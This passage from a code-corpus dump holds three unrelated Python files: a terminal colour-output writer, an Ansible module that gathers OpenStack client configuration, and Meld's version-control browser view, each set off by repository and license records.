terminal_width = get_terminal_width()
# XXX unify with _escaped func below
def ansi_print(text, esc, file=None, newline=True, flush=False):
if file is None:
file = sys.stderr
text = text.rstrip()
if esc and not isinstance(esc, tuple):
esc = (esc,)
if esc and sys.platform != "win32" and file.isatty():
text = (''.join(['\x1b[%sm' % cod for cod in esc]) +
text +
'\x1b[0m') # ANSI color code "reset"
if newline:
text += '\n'
if esc and win32_and_ctypes and file.isatty():
if 1 in esc:
bold = True
esc = tuple([x for x in esc if x != 1])
else:
bold = False
esctable = {() : FOREGROUND_WHITE, # normal
(31,): FOREGROUND_RED, # red
(32,): FOREGROUND_GREEN, # green
(33,): FOREGROUND_GREEN|FOREGROUND_RED, # yellow
(34,): FOREGROUND_BLUE, # blue
(35,): FOREGROUND_BLUE|FOREGROUND_RED, # purple
(36,): FOREGROUND_BLUE|FOREGROUND_GREEN, # cyan
(37,): FOREGROUND_WHITE, # white
(39,): FOREGROUND_WHITE, # reset
}
attr = esctable.get(esc, FOREGROUND_WHITE)
if bold:
attr |= FOREGROUND_INTENSITY
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
if file is sys.stderr:
handle = GetStdHandle(STD_ERROR_HANDLE)
else:
handle = GetStdHandle(STD_OUTPUT_HANDLE)
oldcolors = GetConsoleInfo(handle).wAttributes
attr |= (oldcolors & 0x0f0)
SetConsoleTextAttribute(handle, attr)
while len(text) > 32768:
file.write(text[:32768])
text = text[32768:]
if text:
file.write(text)
SetConsoleTextAttribute(handle, oldcolors)
else:
file.write(text)
if flush:
file.flush()
def should_do_markup(file):
if os.environ.get('PY_COLORS') == '1':
return True
if os.environ.get('PY_COLORS') == '0':
return False
return hasattr(file, 'isatty') and file.isatty() \
and os.environ.get('TERM') != 'dumb' \
and not (sys.platform.startswith('java') and os._name == 'nt')
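# e.g. running "PY_COLORS=1 python script.py" forces markup even when
# stdout is not a tty, and "PY_COLORS=0" disables it regardless of the
# terminal (illustrative shell invocations)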
class TerminalWriter(object):
_esctable = dict(black=30, red=31, green=32, yellow=33,
blue=34, purple=35, cyan=36, white=37,
Black=40, Red=41, Green=42, Yellow=43,
Blue=44, Purple=45, Cyan=46, White=47,
bold=1, light=2, blink=5, invert=7)
# XXX deprecate stringio argument
def __init__(self, file=None, stringio=False, encoding=None):
if file is None:
if stringio:
self.stringio = file = py.io.TextIO()
else:
file = py.std.sys.stdout
elif py.builtin.callable(file) and not (
hasattr(file, "write") and hasattr(file, "flush")):
file = WriteFile(file, encoding=encoding)
if hasattr(file, "isatty") and file.isatty() and colorama:
file = colorama.AnsiToWin32(file).stream
self.encoding = encoding or getattr(file, 'encoding', "utf-8")
self._file = file
self.fullwidth = get_terminal_width()
self.hasmarkup = should_do_markup(file)
self._lastlen = 0
def _escaped(self, text, esc):
if esc and self.hasmarkup:
text = (''.join(['\x1b[%sm' % cod for cod in esc]) +
text +'\x1b[0m')
return text
def markup(self, text, **kw):
esc = []
for name in kw:
if name not in self._esctable:
raise ValueError("unknown markup: %r" %(name,))
if kw[name]:
esc.append(self._esctable[name])
return self._escaped(text, tuple(esc))
def sep(self, sepchar, title=None, fullwidth=None, **kw):
if fullwidth is None:
fullwidth = self.fullwidth
# the goal is to have the line be as long as possible
# under the condition that len(line) <= fullwidth
if sys.platform == "win32":
# if we print in the last column on windows we are on a
# new line but there is no way to verify/neutralize this
# (we may not know the exact line width)
# so let's be defensive to avoid empty lines in the output
fullwidth -= 1
if title is not None:
# we want 2 + 2*len(fill) + len(title) <= fullwidth
# i.e. 2 + 2*len(sepchar)*N + len(title) <= fullwidth
# 2*len(sepchar)*N <= fullwidth - len(title) - 2
# N <= (fullwidth - len(title) - 2) // (2*len(sepchar))
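            # e.g. fullwidth=20, sepchar="=", title="hi":
            #   N = (20 - 2 - 2) // 2 = 8  ->  "======== hi ========"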
N = (fullwidth - len(title) - 2) // (2*len(sepchar))
fill = sepchar * N
line = "%s %s %s" % (fill, title, fill)
else:
# we want len(sepchar)*N <= fullwidth
# i.e. N <= fullwidth // len(sepchar)
line = sepchar * (fullwidth // len(sepchar))
# in some situations there is room for an extra sepchar at the right,
# in particular if we consider that with a sepchar like "_ " the
# trailing space is not important at the end of the line
if len(line) + len(sepchar.rstrip()) <= fullwidth:
line += sepchar.rstrip()
self.line(line, **kw)
def write(self, msg, **kw):
if msg:
if not isinstance(msg, (bytes, text)):
msg = text(msg)
if self.hasmarkup and kw:
markupmsg = self.markup(msg, **kw)
else:
markupmsg = msg
write_out(self._file, markupmsg)
def line(self, s='', **kw):
self.write(s, **kw)
self._checkfill(s)
self.write('\n')
def reline(self, line, **kw):
if not self.hasmarkup:
raise ValueError("cannot use rewrite-line without terminal")
self.write(line, **kw)
self._checkfill(line)
self.write('\r')
self._lastlen = len(line)
def _checkfill(self, line):
diff2last = self._lastlen - len(line)
if diff2last > 0:
self.write(" " * diff2last)
class Win32ConsoleWriter(TerminalWriter):
def write(self, msg, **kw):
if msg:
if not isinstance(msg, (bytes, text)):
msg = text(msg)
oldcolors = None
if self.hasmarkup and kw:
handle = GetStdHandle(STD_OUTPUT_HANDLE)
oldcolors = GetConsoleInfo(handle).wAttributes
default_bg = oldcolors & 0x00F0
attr = default_bg
if kw.pop('bold', False):
attr |= FOREGROUND_INTENSITY
if kw.pop('red', False):
attr |= FOREGROUND_RED
elif kw.pop('blue', False):
attr |= FOREGROUND_BLUE
elif kw.pop('green', False):
attr |= FOREGROUND_GREEN
elif kw.pop('yellow', False):
attr |= FOREGROUND_GREEN|FOREGROUND_RED
else:
attr |= oldcolors & 0x0007
SetConsoleTextAttribute(handle, attr)
write_out(self._file, msg)
if oldcolors:
SetConsoleTextAttribute(handle, oldcolors)
class WriteFile(object):
def __init__(self, writemethod, encoding=None):
self.encoding = encoding
self._writemethod = writemethod
def write(self, data):
if self.encoding:
data = data.encode(self.encoding, "replace")
self._writemethod(data)
def flush(self):
return
if win32_and_ctypes:
TerminalWriter = Win32ConsoleWriter
import ctypes
from ctypes import wintypes
# ctypes access to the Windows console
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLACK = 0x0000 # black text
FOREGROUND_BLUE = 0x0001 # text color contains blue.
FOREGROUND_GREEN = 0x0002 # text color contains green.
FOREGROUND_RED = 0x0004 # text color contains red.
FOREGROUND_WHITE = 0x0007
FOREGROUND_INTENSITY = 0x0008 # text color is intensified.
BACKGROUND_BLACK = 0x0000 # background color black
BACKGROUND_BLUE = 0x0010 # background color contains blue.
BACKGROUND_GREEN = 0x0020 # background color contains green.
BACKGROUND_RED = 0x0040 # background color contains red.
BACKGROUND_WHITE = 0x0070
BACKGROUND_INTENSITY = 0x0080 # background color is intensified.
SHORT = ctypes.c_short
class COORD(ctypes.Structure):
_fields_ = [('X', SHORT),
('Y', SHORT)]
class SMALL_RECT(ctypes.Structure):
_fields_ = [('Left', SHORT),
('Top', SHORT),
('Right', SHORT),
('Bottom', SHORT)]
class CONSOLE_SCREEN_BUFFER_INFO(ctypes.Structure):
_fields_ = [('dwSize', COORD),
('dwCursorPosition', COORD),
('wAttributes', wintypes.WORD),
('srWindow', SMALL_RECT),
('dwMaximumWindowSize', COORD)]
_GetStdHandle = ctypes.windll.kernel32.GetStdHandle
_GetStdHandle.argtypes = [wintypes.DWORD]
_GetStdHandle.restype = wintypes.HANDLE
def GetStdHandle(kind):
return _GetStdHandle(kind)
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
SetConsoleTextAttribute.argtypes = [wintypes.HANDLE, wintypes.WORD]
SetConsoleTextAttribute.restype = wintypes.BOOL
_GetConsoleScreenBufferInfo = \
ctypes.windll.kernel32.GetConsoleScreenBufferInfo
_GetConsoleScreenBufferInfo.argtypes = [wintypes.HANDLE,
ctypes.POINTER(CONSOLE_SCREEN_BUFFER_INFO)]
_GetConsoleScreenBufferInfo.restype = wintypes.BOOL
def GetConsoleInfo(handle):
info = CONSOLE_SCREEN_BUFFER_INFO()
_GetConsoleScreenBufferInfo(handle, ctypes.byref(info))
return info
def _getdimensions():
handle = GetStdHandle(STD_OUTPUT_HANDLE)
info = GetConsoleInfo(handle)
        # Subtract one from the width, otherwise the cursor wraps
# and the ending \n causes an empty line to display.
return info.dwSize.Y, info.dwSize.X - 1
def write_out(fil, msg):
# XXX sometimes "msg" is of type bytes, sometimes text which
# complicates the situation. Should we try to enforce unicode?
try:
# on py27 and above writing out to sys.stdout with an encoding
# should usually work for unicode messages (if the encoding is
# capable of it)
fil.write(msg)
except UnicodeEncodeError:
# on py26 it might not work because stdout expects bytes
if fil.encoding:
try:
fil.write(msg.encode(fil.encoding))
except UnicodeEncodeError:
# it might still fail if the encoding is not capable
pass
else:
fil.flush()
return
# fallback: escape all unicode characters
msg = msg.encode("unicode-escape").decode("ascii")
fil.write(msg)
fil.flush()
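if __name__ == "__main__":
    # minimal demo sketch: writes a separator and a couple of lines to
    # stdout; the markup keywords come from TerminalWriter._esctable and
    # degrade to plain text when stdout is not a tty
    tw = TerminalWriter()
    tw.sep("=", "TerminalWriter demo")
    tw.line("plain line")
    tw.line("green + bold", green=True, bold=True)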
| mpl-2.0 |
QijunPan/ansible | lib/ansible/modules/cloud/openstack/os_client_config.py | 21 | 2493 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: os_client_config
short_description: Get OpenStack Client config
description:
- Get I(openstack) client config data from clouds.yaml or environment
version_added: "2.0"
notes:
- Facts are placed in the C(openstack.clouds) variable.
options:
clouds:
description:
- List of clouds to limit the return list to. No value means return
information on all configured clouds
required: false
default: []
requirements: [ os-client-config ]
author: "Monty Taylor (@emonty)"
'''
EXAMPLES = '''
- name: Get list of clouds that do not support security groups
os_client_config:
- debug:
var: "{{ item }}"
with_items: "{{ openstack.clouds | rejectattr('secgroup_source', 'none') | list }}"
- name: Get the information back just about the mordred cloud
os_client_config:
clouds:
- mordred
'''
import os_client_config
from os_client_config import exceptions
def main():
module = AnsibleModule(argument_spec=dict(
clouds=dict(required=False, type='list', default=[]),
))
p = module.params
try:
config = os_client_config.OpenStackConfig()
clouds = []
for cloud in config.get_all_clouds():
if not p['clouds'] or cloud.name in p['clouds']:
cloud.config['name'] = cloud.name
clouds.append(cloud.config)
module.exit_json(ansible_facts=dict(openstack=dict(clouds=clouds)))
except exceptions.OpenStackConfigException as e:
module.fail_json(msg=str(e))
# import module snippets
from ansible.module_utils.basic import *
if __name__ == "__main__":
main()
| gpl-3.0 |
girving/meld | vcview.py | 1 | 27928 | ### Copyright (C) 2002-2006 Stephen Kennedy <stevek@gnome.org>
### This program is free software; you can redistribute it and/or modify
### it under the terms of the GNU General Public License as published by
### the Free Software Foundation; either version 2 of the License, or
### (at your option) any later version.
### This program is distributed in the hope that it will be useful,
### but WITHOUT ANY WARRANTY; without even the implied warranty of
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
### GNU General Public License for more details.
### You should have received a copy of the GNU General Public License
### along with this program; if not, write to the Free Software
### Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import tempfile
import shutil
import gtk
import os
from gettext import gettext as _
import tree
import misc
import gnomeglade
import melddoc
import paths
import vc
################################################################################
#
# Local Functions
#
################################################################################
def _expand_to_root( treeview, path ):
"""Expand rows from path up to root"""
start = path[:]
while len(start) and not treeview.row_expanded(start):
start = start[:-1]
level = len(start)
while level < len(path):
level += 1
treeview.expand_row( path[:level], 0)
def _commonprefix(files):
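    """Return the directory prefix shared by 'files'.
    A sketch of the intent: ["/a/b/x", "/a/b/y"] is expected to yield
    "/a/b" via misc.commonprefix, while a single path falls back to its
    dirname."""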
if len(files) != 1:
workdir = misc.commonprefix(files)
else:
workdir = os.path.dirname(files[0])
return workdir
################################################################################
#
# CommitDialog
#
################################################################################
class CommitDialog(gnomeglade.Component):
def __init__(self, parent):
gnomeglade.Component.__init__(self, paths.ui_dir("vcview.glade"), "commitdialog")
self.parent = parent
self.widget.set_transient_for( parent.widget.get_toplevel() )
selected = parent._get_selected_files()
topdir = _commonprefix(selected)
selected = [ s[len(topdir):] for s in selected ]
self.changedfiles.set_text( ("(in %s) "%topdir) + " ".join(selected) )
self.widget.show_all()
def run(self):
self.previousentry.child.set_editable(False)
self.previousentry.set_active(0)
self.textview.grab_focus()
buf = self.textview.get_buffer()
buf.place_cursor( buf.get_start_iter() )
buf.move_mark( buf.get_selection_bound(), buf.get_end_iter() )
response = self.widget.run()
msg = buf.get_text(buf.get_start_iter(), buf.get_end_iter(), 0)
if response == gtk.RESPONSE_OK:
self.parent._command_on_selected( self.parent.vc.commit_command(msg) )
if len(msg.strip()):
self.previousentry.prepend_text(msg)
self.widget.destroy()
def on_previousentry_activate(self, gentry):
buf = self.textview.get_buffer()
buf.set_text( gentry.child.get_text() )
COL_LOCATION, COL_STATUS, COL_REVISION, COL_TAG, COL_OPTIONS, COL_END = range(tree.COL_END, tree.COL_END+6)
class VcTreeStore(tree.DiffTreeStore):
def __init__(self):
tree.DiffTreeStore.__init__(self, 1, COL_END)
self.textstyle[tree.STATE_MISSING] = '<span foreground="#000088" strikethrough="true" weight="bold">%s</span>'
################################################################################
# filters
################################################################################
entry_modified = lambda x: (x.state >= tree.STATE_NEW) or (x.isdir and (x.state > tree.STATE_NONE))
entry_normal = lambda x: (x.state == tree.STATE_NORMAL)
entry_nonvc = lambda x: (x.state == tree.STATE_NONE) or (x.isdir and (x.state > tree.STATE_IGNORED))
entry_ignored = lambda x: (x.state == tree.STATE_IGNORED) or x.isdir
################################################################################
#
# VcView
#
################################################################################
class VcView(melddoc.MeldDoc, gnomeglade.Component):
# Map action names to VC commands and required arguments list
action_vc_cmds_map = {
"VcCompare": ("diff_command", ()),
"VcCommit": ("commit_command", ("",)),
"VcUpdate": ("update_command", ()),
"VcAdd": ("add_command", ()),
"VcAddBinary": ("add_command", ()),
"VcResolved": ("resolved_command", ()),
"VcRemove": ("remove_command", ()),
"VcRevert": ("revert_command", ()),
}
def __init__(self, prefs):
melddoc.MeldDoc.__init__(self, prefs)
gnomeglade.Component.__init__(self, paths.ui_dir("vcview.glade"), "vcview")
actions = (
("VcCompare", gtk.STOCK_DIALOG_INFO, _("_Compare"), None, _("Compare selected"), self.on_button_diff_clicked),
("VcOpen", gtk.STOCK_OPEN, None, None, _("Open selected"), self.on_button_open_clicked),
("VcCommit", "vc-commit-24", _("_Commit"), None, _("Commit"), self.on_button_commit_clicked), # FIXME: popup used to use gtk.STOCK_GO_BACK
("VcUpdate", "vc-update-24", _("_Update"), None, _("Update"), self.on_button_update_clicked), # FIXME: popup used to use gtk.STOCK_GO_FORWARD
("VcAdd", "vc-add-24", _("_Add"), None, _("Add to VC"), self.on_button_add_clicked), # FIXME: popup used to use gtk.STOCK_ADD
("VcAddBinary", gtk.STOCK_ADD, _("Add _Binary"), None, _("Add binary to VC"), self.on_button_add_binary_clicked), # FIXME: stock is inconsistent with other VC actions
("VcRemove", "vc-remove-24", _("_Remove"), None, _("Remove from VC"), self.on_button_remove_clicked), # FIXME: popup used to use gtk.STOCK_REMOVE
("VcResolved", "vc-resolve-24", _("_Resolved"), None, _("Mark as resolved for VC"), self.on_button_resolved_clicked),
("VcRevert", gtk.STOCK_REVERT_TO_SAVED, None, None, _("Revert to original"), self.on_button_revert_clicked),
("VcDeleteLocally", gtk.STOCK_DELETE, None, None, _("Delete locally"), self.on_button_delete_clicked), # FIXME: popup label was "_Remove locally"
)
toggleactions = (
("VcFlatten", gtk.STOCK_GOTO_BOTTOM, _("_Flatten"), None, _("Flatten directories"), self.on_button_flatten_toggled, True),
("VcShowModified","filter-modified-24", _("_Modified"), None, _("Show modified"), self.on_button_filter_toggled, True),
("VcShowNormal", "filter-normal-24", _("_Normal"), None, _("Show normal"), self.on_button_filter_toggled, False),
("VcShowNonVC", "filter-nonvc-24", _("Non _VC"), None, _("Show unversioned files"), self.on_button_filter_toggled, False),
("VcShowIgnored", "filter-ignored-24", _("Ignored"), None, _("Show ignored files"), self.on_button_filter_toggled, False),
)
self.ui_file = paths.ui_dir("vcview-ui.xml")
self.actiongroup = gtk.ActionGroup('VcviewActions')
self.actiongroup.set_translation_domain("meld")
self.actiongroup.add_actions(actions)
self.actiongroup.add_toggle_actions(toggleactions)
for action in ("VcCompare", "VcFlatten", "VcShowModified",
"VcShowNormal", "VcShowNonVC", "VcShowIgnored"):
self.actiongroup.get_action(action).props.is_important = True
for action in ("VcCommit", "VcUpdate", "VcAdd", "VcRemove",
"VcShowModified", "VcShowNormal", "VcShowNonVC",
"VcShowIgnored", "VcResolved"):
button = self.actiongroup.get_action(action)
button.props.icon_name = button.props.stock_id
self.tempdirs = []
self.model = VcTreeStore()
self.treeview.set_model(self.model)
self.treeview.get_selection().set_mode(gtk.SELECTION_MULTIPLE)
self.treeview.set_headers_visible(1)
column = gtk.TreeViewColumn( _("Name") )
renpix = gtk.CellRendererPixbuf()
rentext = gtk.CellRendererText()
column.pack_start(renpix, expand=0)
column.pack_start(rentext, expand=1)
column.set_attributes(renpix, pixbuf=self.model.column_index(tree.COL_ICON, 0))
column.set_attributes(rentext, markup=self.model.column_index(tree.COL_TEXT, 0))
self.treeview.append_column(column)
def addCol(name, num):
column = gtk.TreeViewColumn(name)
rentext = gtk.CellRendererText()
column.pack_start(rentext, expand=0)
column.set_attributes(rentext, markup=self.model.column_index(num, 0))
self.treeview.append_column(column)
return column
self.treeview_column_location = addCol( _("Location"), COL_LOCATION)
addCol(_("Status"), COL_STATUS)
addCol(_("Rev"), COL_REVISION)
addCol(_("Tag"), COL_TAG)
addCol(_("Options"), COL_OPTIONS)
class ConsoleStream(object):
def __init__(self, textview):
self.textview = textview
b = textview.get_buffer()
self.mark = b.create_mark("END", b.get_end_iter(), 0)
def write(self, s):
if s:
b = self.textview.get_buffer()
b.insert(b.get_end_iter(), s)
self.textview.scroll_mark_onscreen( self.mark )
self.consolestream = ConsoleStream(self.consoleview)
self.location = None
self.treeview_column_location.set_visible(self.actiongroup.get_action("VcFlatten").get_active())
self.fileentry.show() #TODO: remove once bug 97503 is fixed
if not self.prefs.vc_console_visible:
self.on_console_view_toggle(self.console_hide_box)
self.vc = None
# VC ComboBox
self.combobox_vcs = gtk.ComboBox()
self.combobox_vcs.lock = True
self.combobox_vcs.set_model(gtk.ListStore(str, object))
cell = gtk.CellRendererText()
self.combobox_vcs.pack_start(cell, False)
self.combobox_vcs.add_attribute(cell, 'text', 0)
self.combobox_vcs.lock = False
self.hbox2.pack_end(self.combobox_vcs, expand=False)
self.combobox_vcs.show()
self.combobox_vcs.connect("changed", self.on_vc_change)
def update_actions_sensitivity(self):
"""Disable actions that use not implemented VC plugin methods
"""
for action_name, (meth_name, args) in self.action_vc_cmds_map.items():
action = self.actiongroup.get_action(action_name)
try:
getattr(self.vc, meth_name)(*args)
action.props.sensitive = True
except NotImplementedError:
action.props.sensitive = False
def choose_vc(self, vcs):
"""Display VC plugin(s) that can handle the location"""
self.combobox_vcs.lock = True
self.combobox_vcs.get_model().clear()
tooltip_texts = [_("Choose one Version Control"),
_("Only one Version Control in this directory")]
default_active = 0
# Try to keep the same VC plugin active on refresh()
for idx, avc in enumerate(vcs):
if (self.vc is not None and
self.vc.__class__ == avc.__class__):
default_active = idx
self.combobox_vcs.get_model().append([avc.NAME, avc])
if gtk.pygtk_version >= (2, 12, 0):
self.combobox_vcs.set_tooltip_text(tooltip_texts[len(vcs) == 1])
self.combobox_vcs.set_sensitive(len(vcs) > 1)
self.combobox_vcs.lock = False
self.combobox_vcs.set_active(default_active)
def on_vc_change(self, cb):
if not cb.lock:
self.vc = cb.get_model()[cb.get_active_iter()][1]
self._set_location(self.vc.root)
self.update_actions_sensitivity()
def set_location(self, location):
self.choose_vc(vc.get_vcs(os.path.abspath(location or ".")))
def _set_location(self, location):
self.location = location
self.model.clear()
self.fileentry.set_filename(location)
self.fileentry.prepend_history(location)
it = self.model.add_entries( None, [location] )
self.treeview.grab_focus()
self.treeview.get_selection().select_iter(it)
self.model.set_state(it, 0, tree.STATE_NORMAL, isdir=1)
self.recompute_label()
self.scheduler.remove_all_tasks()
self.scheduler.add_task( self._search_recursively_iter(self.model.get_iter_root()).next )
def recompute_label(self):
self.label_text = os.path.basename(self.location)
self.label_changed()
def _search_recursively_iter(self, iterstart):
yield _("[%s] Scanning %s") % (self.label_text,"")
rootpath = self.model.get_path( iterstart )
rootname = self.model.value_path( self.model.get_iter(rootpath), 0 )
prefixlen = 1 + len( self.model.value_path( self.model.get_iter_root(), 0 ) )
todo = [ (rootpath, rootname) ]
filters = []
if self.actiongroup.get_action("VcShowModified").get_active():
filters.append( entry_modified )
if self.actiongroup.get_action("VcShowNormal").get_active():
filters.append( entry_normal )
if self.actiongroup.get_action("VcShowNonVC").get_active():
filters.append( entry_nonvc )
if self.actiongroup.get_action("VcShowIgnored").get_active():
filters.append( entry_ignored )
def showable(entry):
for f in filters:
if f(entry): return 1
recursive = self.actiongroup.get_action("VcFlatten").get_active()
self.vc.cache_inventory(rootname)
while len(todo):
todo.sort() # depth first
path, name = todo.pop(0)
if path:
it = self.model.get_iter( path )
root = self.model.value_path( it, 0 )
else:
it = self.model.get_iter_root()
root = name
yield _("[%s] Scanning %s") % (self.label_text, root[prefixlen:])
#import time; time.sleep(1.0)
entries = filter(showable, self.vc.listdir(root))
differences = 0
for e in entries:
differences |= (e.state != tree.STATE_NORMAL)
if e.isdir and recursive:
todo.append( (None, e.path) )
continue
child = self.model.add_entries(it, [e.path])
self._update_item_state( child, e, root[prefixlen:] )
if e.isdir:
todo.append( (self.model.get_path(child), None) )
if not recursive: # expand parents
if len(entries) == 0:
self.model.add_empty(it, _("(Empty)"))
if differences or len(path)==1:
_expand_to_root( self.treeview, path )
else: # just the root
self.treeview.expand_row( (0,), 0)
self.vc.uncache_inventory()
def on_fileentry_activate(self, fileentry):
path = fileentry.get_full_path()
self.set_location(path)
def on_quit_event(self):
self.scheduler.remove_all_tasks()
for f in self.tempdirs:
if os.path.exists(f):
shutil.rmtree(f, ignore_errors=1)
def on_delete_event(self, appquit=0):
self.on_quit_event()
return gtk.RESPONSE_OK
def on_row_activated(self, treeview, path, tvc):
it = self.model.get_iter(path)
if self.model.iter_has_child(it):
if self.treeview.row_expanded(path):
self.treeview.collapse_row(path)
else:
self.treeview.expand_row(path,0)
else:
path = self.model.value_path(it, 0)
self.run_diff( [path] )
def run_diff_iter(self, path_list, empty_patch_ok):
yield _("[%s] Fetching differences") % self.label_text
difffunc = self._command_iter(self.vc.diff_command(), path_list, 0).next
diff = None
while type(diff) != type(()):
diff = difffunc()
yield 1
prefix, patch = diff[0], diff[1]
yield _("[%s] Applying patch") % self.label_text
if patch:
self.show_patch(prefix, patch)
elif empty_patch_ok:
misc.run_dialog( _("No differences found."), parent=self, messagetype=gtk.MESSAGE_INFO)
else:
for path in path_list:
self.emit("create-diff", [path])
def run_diff(self, path_list, empty_patch_ok=0):
for path in path_list:
self.scheduler.add_task(self.run_diff_iter([path], empty_patch_ok).next, atfront=1)
def on_button_press_event(self, text, event):
if event.button==3:
self.popup_menu.popup(None, None, None, 3, event.time)
return len(self._get_selected_treepaths()) != 1
return 0
def on_button_flatten_toggled(self, button):
self.treeview_column_location.set_visible(self.actiongroup.get_action("VcFlatten").get_active())
self.refresh()
def on_button_filter_toggled(self, button):
self.refresh()
def _get_selected_treepaths(self):
sel = []
def gather(model, path, it):
sel.append( model.get_path(it) )
s = self.treeview.get_selection()
s.selected_foreach(gather)
return sel
def _get_selected_files(self):
sel = []
def gather(model, path, it):
sel.append( model.value_path(it,0) )
s = self.treeview.get_selection()
s.selected_foreach(gather)
# remove empty entries and remove trailing slashes
return [ x[-1]!="/" and x or x[:-1] for x in sel if x != None ]
def _command_iter(self, command, files, refresh):
"""Run 'command' on 'files'. Return a tuple of the directory the
command was executed in and the output of the command.
"""
msg = misc.shelljoin(command)
yield "[%s] %s" % (self.label_text, msg.replace("\n", u"\u21b2") )
def relpath(pbase, p):
kill = 0
if len(pbase) and p.startswith(pbase):
kill = len(pbase) + 1
return p[kill:] or "."
if len(files) == 1 and os.path.isdir(files[0]):
workdir = self.vc.get_working_directory(files[0])
else:
workdir = self.vc.get_working_directory( _commonprefix(files) )
files = [ relpath(workdir, f) for f in files ]
r = None
self.consolestream.write( misc.shelljoin(command+files) + " (in %s)\n" % workdir)
readfunc = misc.read_pipe_iter(command + files, self.consolestream, workdir=workdir).next
try:
while r == None:
r = readfunc()
self.consolestream.write(r)
yield 1
except IOError, e:
misc.run_dialog("Error running command.\n'%s'\n\nThe error was:\n%s" % ( misc.shelljoin(command), e),
parent=self, messagetype=gtk.MESSAGE_ERROR)
if refresh:
self.refresh_partial(workdir)
yield workdir, r
def _command(self, command, files, refresh=1):
"""Run 'command' on 'files'.
"""
self.scheduler.add_task( self._command_iter(command, files, refresh).next )
def _command_on_selected(self, command, refresh=1):
files = self._get_selected_files()
if len(files):
self._command(command, files, refresh)
else:
misc.run_dialog( _("Select some files first."), parent=self, messagetype=gtk.MESSAGE_INFO)
def on_button_update_clicked(self, obj):
self._command_on_selected( self.vc.update_command() )
def on_button_commit_clicked(self, obj):
dialog = CommitDialog( self )
dialog.run()
def on_button_add_clicked(self, obj):
self._command_on_selected(self.vc.add_command() )
def on_button_add_binary_clicked(self, obj):
self._command_on_selected(self.vc.add_command(binary=1))
def on_button_remove_clicked(self, obj):
self._command_on_selected(self.vc.remove_command())
def on_button_resolved_clicked(self, obj):
self._command_on_selected(self.vc.resolved_command())
def on_button_revert_clicked(self, obj):
self._command_on_selected(self.vc.revert_command())
def on_button_delete_clicked(self, obj):
files = self._get_selected_files()
for name in files:
try:
if os.path.isfile(name):
os.remove(name)
elif os.path.isdir(name):
if misc.run_dialog(_("'%s' is a directory.\nRemove recursively?") % os.path.basename(name),
parent = self,
buttonstype=gtk.BUTTONS_OK_CANCEL) == gtk.RESPONSE_OK:
shutil.rmtree(name)
except OSError, e:
misc.run_dialog(_("Error removing %s\n\n%s.") % (name,e), parent = self)
workdir = _commonprefix(files)
self.refresh_partial(workdir)
def on_button_diff_clicked(self, obj):
files = self._get_selected_files()
if len(files):
self.run_diff(files, empty_patch_ok=1)
def on_button_open_clicked(self, obj):
self._open_files(self._get_selected_files())
def show_patch(self, prefix, patch):
tmpdir = tempfile.mkdtemp("-meld")
self.tempdirs.append(tmpdir)
diffs = []
for fname in self.vc.get_patch_files(patch):
destfile = os.path.join(tmpdir,fname)
destdir = os.path.dirname( destfile )
if not os.path.exists(destdir):
os.makedirs(destdir)
pathtofile = os.path.join(prefix, fname)
try:
shutil.copyfile( pathtofile, destfile)
except IOError: # it is missing, create empty file
open(destfile,"w").close()
diffs.append( (destfile, pathtofile) )
patchcmd = self.vc.patch_command( tmpdir )
if misc.write_pipe(patchcmd, patch) == 0:
for d in diffs:
self.emit("create-diff", d)
else:
import meldapp
msg = _("""
Invoking 'patch' failed.
Maybe you don't have 'GNU patch' installed,
or you use an untested version of %s.
Please send email bug report to:
meld-list@gnome.org
Containing the following information:
- meld version: '%s'
- source control software type: '%s'
- source control software version: 'X.Y.Z'
- the output of '%s somefile.txt'
- patch command: '%s'
(no need to actually run it, just provide
the command line)
Replace 'X.Y.Z' by the actual version for the
source control software you use.
""") % (self.vc.NAME,
meldapp.version,
self.vc.NAME,
" ".join(self.vc.diff_command()),
" ".join(patchcmd))
msg = '\n'.join([line.strip() for line in msg.split('\n')])
misc.run_dialog(msg, parent=self)
def refresh(self):
self.set_location( self.model.value_path( self.model.get_iter_root(), 0 ) )
def refresh_partial(self, where):
if not self.actiongroup.get_action("VcFlatten").get_active():
it = self.find_iter_by_name( where )
if it:
newiter = self.model.insert_after( None, it)
self.model.set_value(newiter, self.model.column_index( tree.COL_PATH, 0), where)
self.model.set_state(newiter, 0, tree.STATE_NORMAL, isdir=1)
self.model.remove(it)
self.scheduler.add_task( self._search_recursively_iter(newiter).next )
else: # XXX fixme
self.refresh()
def _update_item_state(self, it, vcentry, location):
e = vcentry
self.model.set_state( it, 0, e.state, e.isdir )
def setcol(col, val):
self.model.set_value(it, self.model.column_index(col, 0), val)
setcol(COL_LOCATION, location)
setcol(COL_STATUS, e.get_status())
setcol(COL_REVISION, e.rev)
setcol(COL_TAG, e.tag)
setcol(COL_OPTIONS, e.options)
def on_file_changed(self, filename):
it = self.find_iter_by_name(filename)
if it:
path = self.model.value_path(it, 0)
files = self.vc.lookup_files([], [(os.path.basename(path), path)])[1]
for e in files:
if e.path == path:
prefixlen = 1 + len( self.model.value_path( self.model.get_iter_root(), 0 ) )
self._update_item_state( it, e, e.parent[prefixlen:])
return
def find_iter_by_name(self, name):
it = self.model.get_iter_root()
path = self.model.value_path(it, 0)
while it:
if name == path:
return it
elif name.startswith(path):
child = self.model.iter_children( it )
while child:
path = self.model.value_path(child, 0)
if name == path:
return child
elif name.startswith(path):
break
else:
child = self.model.iter_next( child )
it = child
else:
break
return None
def on_console_view_toggle(self, box, event=None):
if box == self.console_hide_box:
self.prefs.vc_console_visible = 0
self.console_hbox.hide()
self.console_show_box.show()
else:
self.prefs.vc_console_visible = 1
self.console_hbox.show()
self.console_show_box.hide()
